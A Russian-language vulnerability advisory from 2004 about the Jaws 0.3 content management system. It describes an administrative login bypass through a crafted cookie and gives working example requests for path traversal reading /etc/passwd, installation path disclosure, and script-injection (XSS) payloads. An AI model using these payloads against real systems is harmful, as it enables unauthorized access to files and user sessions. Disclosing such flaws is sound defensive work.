| Дата публикации: | 07.07.2004 |
| Всего просмотров: | 1330 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Jaws 0.3
Описание: Несколько уязвимостей обнаружено в Jaws. Удаленный пользователь может получить административный доступ. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный пользователь может также определить инсталляционный путь и выполнить XSS нападение. 1. Удаленный пользователь может получить административный доступ к целевому приложению из за логической ошибки в функции logged_on(). Удаленный пользователь может установить специально обработанное значение Куки к MD5 хешу или нулевому значению, чтобы получить доступ через admin.php сценарий. 2. Просмотр произвольных файлов: http://127.0.0.1/jaws/index.php?gadget=../../../../../../. ./../../../etc/passwd%00&path=/etc3. Определение инсталляционного пути: http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc4. Раскрытие инсталляционного пути: http://127.0.0.1/jaws/include/config.php5. XSS:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>
URL производителя: http://www.jaws.com.mx/ Решение: Установите обновленную версию программы (0.3). |
|
| Ссылки: | Multiples vulnerabilities in JAWS |